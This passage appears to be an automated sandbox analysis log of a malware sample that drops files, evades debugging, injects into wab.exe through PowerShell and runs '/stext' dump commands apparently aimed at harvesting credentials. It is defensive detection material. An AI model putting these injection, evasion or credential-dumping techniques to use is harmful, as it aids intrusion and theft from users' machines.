              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08E84BF8 push ebp; ret 7_2_08E84BE8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08E84BCF push ebp; ret 7_2_08E84BE8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08E819C1 push ebp; ret 7_2_08E819C2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08E80D2E push esp; retf 7_2_08E80D2F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08E80B3A push eax; iretd 7_2_08E80B3B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044693D push ecx; ret 12_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00451D54 push eax; ret 12_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00451D34 push eax; ret 13_2_00451D41
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00444E71 push ecx; ret 13_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Users\user\Desktop\Uundgaaelige.exeFile created: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exeJump to dropped file
              Source: C:\Users\user\Desktop\Uundgaaelige.exeFile created: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dllJump to dropped file
              Source: C:\Users\user\Desktop\Uundgaaelige.exeFile created: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
              Source: C:\Users\user\Desktop\Uundgaaelige.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 51CD2C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9792Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 9368Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1740Jump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dllJump to dropped file
              Source: C:\Users\user\Desktop\Uundgaaelige.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dllJump to dropped file
              Source: C:\Users\user\Desktop\Uundgaaelige.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5196Thread sleep time: -111500s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2988Thread sleep time: -285000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2988Thread sleep time: -28104000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405861
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_0040639C FindFirstFileA,FindClose,4_2_0040639C
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_004026F8 FindFirstFileA,4_2_004026F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
              Source: wab.exe, 0000000A.00000003.216795183142.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805263947.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Uundgaaelige.exeAPI call chain: ExitProcess graph end nodegraph_4-3326
              Source: C:\Users\user\Desktop\Uundgaaelige.exeAPI call chain: ExitProcess graph end nodegraph_4-3515
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_13-34114
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 55F854Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"Jump to behavior
              Source: wab.exe, 0000000A.00000003.216310061267.0000000006C63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825176879.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805079864.0000000006C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000003.216825176879.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805079864.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805219077.0000000006C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageranager
              Source: wab.exe, 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP-
              Source: wab.exe, 0000000A.00000003.216825176879.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805079864.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805219077.0000000006C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV
              Source: wab.exe, 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTypes\Type 001
